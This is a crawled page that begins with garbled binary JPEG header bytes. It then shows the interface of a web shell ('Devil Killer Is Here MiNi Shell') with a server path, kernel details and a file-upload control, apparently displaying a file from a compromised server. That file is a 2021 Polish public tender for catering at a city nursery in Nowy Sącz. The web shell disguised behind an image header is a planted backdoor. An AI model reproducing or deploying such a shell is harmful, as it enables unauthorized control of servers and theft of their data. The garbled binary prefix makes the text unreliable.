JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211215/0031632201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ŚWIADCZENIE USŁUGI CATERINGOWEJ<br/>NA RZECZ ŻŁOBKA MIEJSKIEGO NR 2 W NOWYM SĄCZU”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ ŻŁOBKÓW MIEJSKICH W NOWYM SĄCZU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 383634430</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Podhalańska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Sącz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mznowysacz@poczta.fm</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.malopolska.pl/mznowysacz</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ŚWIADCZENIE USŁUGI CATERINGOWEJ<br/>NA RZECZ ŻŁOBKA MIEJSKIEGO NR 2 W NOWYM SĄCZU”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2be1bdda-5d94-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00316322</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/mznowysacz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i 730).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują: przy użyciu<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>4. Rejestracja na miniPortal, w tym złożenie oferty w formie elektronicznej, wymaga: Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>5. Rejestracja i korzystanie z miniPortal: Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>7. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>8. Osobą uprawnioną do porozumiewania się z Wykonawcami jest:<br/>1) w zakresie proceduralnym:<br/>Aleksandra Sopata<br/>2) w zakresie merytorycznym:<br/>Aleksandra Sopata<br/>9. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem<br/>przedmiotowego postępowania.<br/>10. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>11. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni<br/>przed upływem terminu składania odpowiednio ofert, pod warunkiem że wniosek o wyjaśnienie treści<br/>SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania<br/>odpowiednio ofert.<br/>12. Jeżeli zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w ust. 11, przedłuża termin<br/>składania ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z<br/>wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia ofert. W przypadku gdy wniosek o<br/>wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w ust. 11, zamawiający nie ma<br/>obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.<br/>13. Przedłużenie terminu składania ofert, o których mowa w ust. 12, nie wpływa na bieg terminu<br/>składania wniosku o wyjaśnienie treści SWZ.<br/>Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert i wniosków)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest DYREKTOR ZESPOŁU ŻŁOBKÓW MIEJSKICH<br/>W NOWYM SĄCZU Z SIEDZIBĄ UL. PODHALAŃSKA 38, 33-300 NOWY SĄCZ;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: IODZLOBEKNOWYSACZ@GMAIL.COM<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonegopostępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZŻM.26.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety społecznej</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>1. Przedmiotem zamówienia na usługę społeczną jest świadczenie usługi cateringowej na rzecz<br/>Żłobka Miejskiego nr 2 w Nowym Sączu.<br/>2. Miejsce realizacji usługi: Żłobek Miejski Nr 2 w Nowym Sączu, ul. Podhalańska 38, 33-300<br/>Nowy Sącz, zwany dalej „Żłobkiem”, który jest jednostką organizacyjną Zespołu Żłobków<br/>Miejskich w Nowym Sączu -miejskiej jednostki organizacyjnej Miasta Nowy Sącz utworzonej na<br/>mocy Uchwały Nr XIII/135/2019 Rady Miasta Nowego Sącza z dnia 21 maja 2019 r. w sprawie<br/>zmiany nazwy i nadania statutu Żłobkowi Miejskiemu w Nowym Sączu, ul. Klasztorna 46,<br/>utworzenia Żłobka Miejskiego Nr 2 w Nowym Sączu i Żłobka Miejskiego Nr 3 w Nowym Sączu i<br/>nadania im statutów oraz utworzenia i nadania statutu Zespołu Żłobków Miejskich w NowymSączu (Dz. Urz. Woj. Małop. z dnia 28 maja 2019 r. Poz. 4173 ze zm.).<br/>3. Przedmiot zamówienia obejmuje przygotowanie czterech posiłków dziennie tj. śniadanie,<br/>drugie śniadanie, obiad (dwa dania) i podwieczorek dla grupy 66 dzieci w okresie od dnia<br/>03.01.2022 r. do dnia 30.12.2022 r. Posiłki będą dostarczane w dni robocze tj. od poniedziałku<br/>do piątku z wyjątkiem dni ustawowo wolnych od pracy.<br/>4. Zgodnie ze złożoną ofertą Wykonawca zobowiązany będzie dostarczyć zamówione posiłki<br/>trzy razy dziennie, w godzinach:<br/>• 7.00-7.30 pierwsze i drugie śniadanie,<br/>• 10.00-10.20 obiad pierwsze i drugie danie,<br/>• 13.45 – 14.00 podwieczorek.<br/>5. Planowane wielkości dziennych dostaw mają charakter szacunkowy, w zależności od<br/>frekwencji dzieci lub zmiany deklaracji rodziców zgłaszających chęć żywienia dzieci i mogą ulec<br/>zmniejszeniu oraz nie mogą stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek<br/>roszczeń. Powyższe oznacza, że Zamawiający zastrzega sobie prawo do zmiany ilości dzieci i<br/>ilości dostarczanych posiłków zgodnie z rzeczywistą potrzebą, wg następujących zasad:<br/>1) Żłobek powiadomi Wykonawcę o ostatecznej ilości posiłków najpóźniej do godziny 14:00 dnia<br/>poprzedniego składając stosowne zamówienie telefonicznie lub mailem, uwzględniając w<br/>ogólnej liczbie dzieci<br/>2) rozliczenia finansowe Wykonawcy usługi ze Żłobkiem odbywać się będzie raz w miesiącu.<br/>6. Wykonawca zobowiązany jest do przygotowywania posiłków o najwyższym standardzie na<br/>bazie produktów najwyższej jakości, zachowując jakość i estetykę wykonania zgodnie z<br/>normami HACCP oraz zbiorowego żywienia i wymogami sanitarno-epidemiologicznymi.<br/>Wykonawca jest zobowiązany przestrzegać zapisów art. 22 ustawy z dnia 4 lutego 2011 r. o<br/>opiece nad dziećmi do lat 3 (t.j. Dz. U z 2021 r. poz. 75)<br/>Dodatkowe wymagania Zamawiającego:<br/>1. Jadłospis powinien być urozmaicony, rodzaj potraw nie może powtarzać się w ciągu 10 dni,<br/>na jadłospisie winny być oznaczone substancje powodujące alergię lub wywołujące alergie oraz<br/>reakcję nietolerancji.<br/>2. W tygodniu powinien być dostarczany co najmniej 3 razy obiad z drugim daniem mięsnym lub<br/>rybnym.<br/>3. Potrawy powinny być lekkostrawne, przygotowane z surowców wysokiej jakości, świeżych,<br/>posiadających aktualne terminy ważności, nabytych w źródłach działających zgodnie<br/>z obowiązującymi przepisami sanitarnymi i higienicznymi, naturalnych, mało przetworzonych,<br/>z ograniczoną ilością substancji dodatkowych –konserwujących, zagęszczających, barwiących<br/>lub sztucznie aromatyzowanych, zmniejszenie zużycia soli na rzecz naturalnych przypraw<br/>ziołowych.<br/>4. W jadłospisie powinny przeważać potrawy gotowane, pieczone i duszone, okazjonalnie<br/>smażone.<br/>5. W przypadku dań mięsnych należy unikać mięsa przetworzonego (mielone) na rzecz całych<br/>sztuk mięsa, wyklucza się używania produktów typu instant oraz gotowych produktów np.:<br/>mrożone pierogi, gołąbki, klopsy, używania produktów typu masłopodobnych, seropodobnych<br/>wędliny<br/>w swoim składzie mają zawierać powyżej 80% mięsa, nie mogą zawierać dodatków skrobi i soi,<br/>mięso nie może być MOM (mięso odkostnione mechanicznie).<br/>6. Wyklucza się stosowania produktów z glutaminianem sodu, produktów z zawartością<br/>barwników, konserwantów i zagęszczaczy szkodliwych dla zdrowia.<br/>7. Do przygotowania posiłków zalecane jest: stosowanie tłuszczów roślinnych (ograniczone<br/>stosowanie tłuszczów zwierzęcych), stosowanie dużej ilości świeżych warzyw i owoców,<br/>(absolutny zakaz przygotowywania posiłków z mrożonek) w tym także wykorzystanie owoców<br/>sezonowych takich jak : truskawki, maliny, jagody, wykorzystanie nasion roślin strączkowych<br/>oraz różnego rodzaju kasz (jęczmienna, kus-kus, manna, burgur).<br/>8. Jadłospis przygotowany i podpisany przez osobę posiadającą odpowiednie uprawnienia i<br/>doświadczenie, tj. dietetyka lub technologa żywienia zbiorowego zatrudnionego na etacie<br/>Wykonawcy (umowa o pracę) lub będącego Wykonawcą w postaci osoby fizycznej prowadzącej<br/>działalność gospodarczą.<br/>9. W jadłospisie należy uwzględnić stosowanie diety: ogólnej, diety dla dzieci od 20 tygodnia<br/>życia, jarskiej, bezmlecznej, bezglutenowej oraz innych diet pokarmowych w zależności od<br/>indywidualnych potrzeb dzieci zgodnie z informacją otrzymaną od Zamawiającego.<br/>10. Wykonawca w ramach przedmiotu umowy dostarcza:<br/>a) śniadanie - zupa mleczna (takie jak: zacierka na mleku, lane ciasto, makaron, kasza jaglana,<br/>kasza manna, jęczmienna, płatki kukurydziane lub potrawy mleczne i mleko – pochodne,<br/>kanapka z różnym rodzajem pieczywa, herbata w tym ziołowa lub owocowa, sok, wędlina, pasty<br/>w tym jajeczna, mięsna , warzywna, dżem, miód, sery, warzywa np. pomidor, ogórek itp.;<br/>b) drugie śniadanie – owoce, kaszka manna z sokiem, musy owocowe, jogurt naturalny z<br/>owocami, sałatka owocowa, chrupki kukurydziane, biszkopty, wafle ryżowe itp.<br/>c) obiad – zupa ( pomidorowa, rosół , ogórkowa, barszcz z uszkami, brokułowa, dyniowa,<br/>szpinakowa, kalafiorowa, ziemniaczana itp.:) drugie danie: ziemniaki, zamiennie ryż, różne<br/>rodzaje kasz, kopytka, makaron, dania mięsne np. sztuka mięsa, udziec kurczaka, pierś z<br/>indyka, pulpety rybne, kotleciki rybne, pulpety mięsne, kotlety z piersi z kurczaka, gulasz, pierogi<br/>( ruskie, leniwe, z mięsem, z mięsem i kapustą) naleśniki, knedle, gołąbki, makaron ze serem,<br/>makaron z musem owocowym itp., surówka, warzywa na parze, kompot, sok itp.;<br/>d) Podwieczorek - kanapka, ciasto, raz w tygodniu, domowe takie jak: ciasto z owocami,<br/>marchewkowe, szarlotka, babka piaskowa itp., desery mleczne, owoce (w tym sezonowe),<br/>herbata, napój mleczny, sok ze świeżych owoców itp. a w przypadku ciepłych dań: kisiel, budyń,<br/>panna cotta, galaretka z owocami, kakao, itp.<br/>Do przygotowania dań mięsnych należy używać mięso z kurczaka, indyka, wieprzowiny B/K,<br/>wołowiny B/K. Jeśli chodzi o dania rybne, należy je przygotowywać z dorsza, łososia, miruny<br/>bez skóry.<br/>Wykonawca jest zobowiązany do dostarczania wody mineralnej niegazowanej 18 litrów/<br/>tygodniowo.<br/>11. Do obowiązków Żłobka realizowanych za pomocą personelu własnego należeć będzie<br/>porcjowanie i wydawanie posiłków dzieciom, oraz mycie naczyń, sprzątanie pomieszczeń, w<br/>których spożywane będą posiłki.<br/>12. Pojemniki, w którym dostarczane są posiłki odbiera Wykonawca, który zobowiązany jest do<br/>ich mycia i dezynfekcji.<br/>13. Zamawiający wymaga, aby Wykonawca w związku realizacją zamówienia zatrudniał co<br/>najmniej jedną osobę z co najmniej jednej z grup określonych w Rozdz. III pkt 10 SWZ.<br/>14. Wspólny Słownik Zamówień CPV: 55321000-6 Usługi przygotowywania posiłków,<br/>55520000-1 Usługi dostarczania posiłków.<br/>15. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych<br/>we wzorze umowy stanowiącym Załącznik nr 5.<br/>16. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>17. Zamawiający nie dopuszcza możliwości składania ofert wariantowych oraz w postaci<br/>katalogów elektronicznych.<br/>18. Miejsce realizacji zamówienia: Polska, woj. małopolskie, Nowy Sącz ul. Podhalańska 38.<br/>19. Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 P.Z.P.<br/>Zamówienie polegające na powtórzeniu podobnych usług zostanie udzielone w okresie 3 lat od<br/>dnia udzielenia zamówienia podstawowego w przypadku, gdy zaistnieje uzasadniona potrzeba<br/>rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel.<br/>Przedmiot zamówienia zostanie wykonany w kuchni Wykonawcy, zwanej dalej „Kuchnią” z jego<br/>materiałów i środkami Wykonawcy, przez zatrudnionych przez niego pracowników.<br/>20. Ważne: po stronie wykonawcy, wywóz odpadów 